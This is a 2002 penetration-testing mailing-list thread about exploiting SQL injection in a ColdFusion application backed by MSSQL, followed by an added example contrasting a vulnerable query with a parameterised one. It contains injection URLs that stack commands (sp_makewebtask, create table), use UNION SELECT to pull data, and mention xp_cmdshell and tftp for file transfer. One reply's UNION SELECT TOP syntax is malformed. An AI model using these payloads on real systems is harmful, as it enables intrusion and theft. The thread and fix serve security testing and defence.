Re: SQL INJECTION IN Coldfusion

From: wirepair (wirepair@roguemail.net)
Date: 09/17/02


From: "wirepair" <wirepair@roguemail.net>
To: Cesar <cesarc56@yahoo.com>, Mr Ro <vnmrro@yahoo.com>, pen-test@securityfocus.com
Date: Tue, 17 Sep 2002 06:59:55 -0700

you may also want to try:
UNION file.cfm?id=4567 UNION SELECT TOP 3 FROM mrro--
or 4 if it is four lines, etc.

On Fri, 13 Sep 2002 19:04:37 -0700 (PDT)
  Cesar <cesarc56@yahoo.com> wrote:
>Hi.
>You must use UNION ALL to get all the rows.
>
>For new techniques take a look at this paper:
>
>Manipulating MS Sql Server using sql injection.
>http://www.appsecinc.com/news/briefing.html#inject
>
>Cesar.
>
>--- Mr Ro <vnmrro@yahoo.com> wrote:
>> hello pen-tester,
>> I am dealing with a pen-test against a CFM server with MSSQL as backend.
>> It is vulnerable to direct SQL injection.
>> I figured out that I can create, drop... tables, execute xp_cmdshell,
>> sp_makewebtask, so I submit:
>> http://mysite/file.cfm?id=4546;exec sp_makewebtask "C:\winnt\temp\blah.htm","select * from master..sysmessages"--
>> It's okay, and I want to get "C:\winnt\temp\blah.htm".
>> I submit:
>> http://mysite/file.cfm?id=4567;create table blah (line varchar(8000))--
>> and then I submit:
>> http://mysite/file.cfm?id=4567 UNION SELECT line from mrro--
>> It returns an error complaining that "All queries in an SQL statement
>> containing a UNION operator must have an equal number of expressions in
>> their target lists."
>> So I keep adding "line" in my request URL
>> (http://mysite/file.cfm?id=4567 UNION SELECT line,line,line from mrro--);
>> finally it returns an error message like this:
>> "[Microsoft][ODBC SQL Server Driver][SQL Server]The text, ntext, or image
>> data type cannot be selected as DISTINCT."
>> Question here: who can explain to me what happened?
>>
>> I know there is another way to download or upload files using "tftp", so
>> is there any free "tftp" server for me to use instead of installing a new
>> one?
>> Thanks for reading.
>> best regards
>> mrro
>>


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
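As an added defensive example (not code from anyone in this thread): the shape of ColdFusion query that lets the `id` parameter be extended with `;exec ...` or ` UNION SELECT ...` as described above, beside the same query using `cfqueryparam`, which binds the value as a typed parameter so it is never parsed as SQL. The datasource, table and column names are assumptions.

```cfml
<!--- Vulnerable form: the raw URL parameter is concatenated into the SQL
      text, so "4567 UNION SELECT ..." or "4546;exec sp_makewebtask ..."
      becomes part of the statement SQL Server executes. --->
<cfquery name="getItem" datasource="appDSN">
    SELECT id, title, body
    FROM items
    WHERE id = #url.id#
</cfquery>

<!--- Hardened form: the value is sent as a bound integer parameter.
      A value such as "4567 UNION SELECT line from mrro--" is rejected
      by the cf_sql_integer type check instead of reaching the database,
      and even a well-formed value can never change the statement's
      structure. --->
<cfparam name="url.id" type="integer">
<cfquery name="getItem" datasource="appDSN">
    SELECT id, title, body
    FROM items
    WHERE id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
</cfquery>
```

The datasource login deserves the same scrutiny: the `xp_cmdshell` and `sp_makewebtask` calls in the thread only succeed because the account the application connects with holds rights far beyond reading its own tables.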